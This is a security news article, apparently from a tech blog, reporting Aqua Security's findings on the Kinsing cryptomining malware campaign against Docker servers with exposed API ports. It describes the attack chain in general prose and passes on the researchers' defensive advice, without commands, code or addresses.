Kinsing Malware Actively Targeting Docker Servers With Exposed API Ports

  •  
  •  
  •  
  • 1
  •  
  •  
  •  
    1
    Share

Researchers have found a malware operation in the wild targeting docker servers. Dubbed Kinsing, the malware is actively targeting Docker servers with exposed API ports.

Kinsing Malware Targeting Docker Servers

Reportedly, the security team from Aqua Security, have found an active malware campaign targeting Docker servers. As elaborated in their blog post, the malware dubbed Kinsing is targeting Docker servers with exposed APIs in the wild. This allows the attackers to install cryptominers and exploit the infected servers to spread the infection.

As stated by the researchers,

The attackers exploit a misconfigured Docker API port to run an Ubuntu container with the kinsing malicious malware, which in turn runs a cryptominer and then attempts to spread the malware to other containers and hosts.

While the detailed technical analysis of the attack is available in the researchers’ post, here is a brief.

The attack begins when the attackers detect an unprotected open Docker API port. They then instantiate an Ubuntu container with an entry point to download a shell script d.sh from either of their three IP addresses. This shell script performs various activities facilitating the execution of malware. The same also downloads and runs the Kinsing malware.

This malware has several C&C servers each dedicated to separate operations. Though this malware aims to deploy cryptominer (kdevtmpfsi), it also performs other activities such as lateral movement to target other systems.

Infection Campaign Going Around For Months

According to Aqua, Kinsing malware attackers have been actively going on for months targeting misconfigured open Docker Daemon API ports. Almost every day, the researchers could witness thousands of such attempts.

Researchers advise companies to ensure the security of all their API ports whilst reviewing their Docker instances. Companies can protect the exposed admin endpoints behind firewalls or VPNs and should disable them when not in use.

Let us know your thoughts in the comments.

The following two tabs change content below.

Abeerah Hashim

Abeerah has been a passionate blogger for several years with a particular interest towards science and technology. She is crazy to know everything about the latest tech developments. Knowing and writing about cybersecurity, hacking, and spying has always enchanted her. When she is not writing, what else can be a better pastime than web surfing and staying updated about the tech world! Reach out to me at: [email protected]

Abeerah Hashim

Abeerah has been a passionate blogger for several years with a particular interest towards science and technology. She is crazy to know everything about the latest tech developments. Knowing and writing about cybersecurity, hacking, and spying has always enchanted her. When she is not writing, what else can be a better pastime than web surfing and staying updated about the tech world! Reach out to me at: [email protected]

Do NOT follow this link or you will be banned from the site!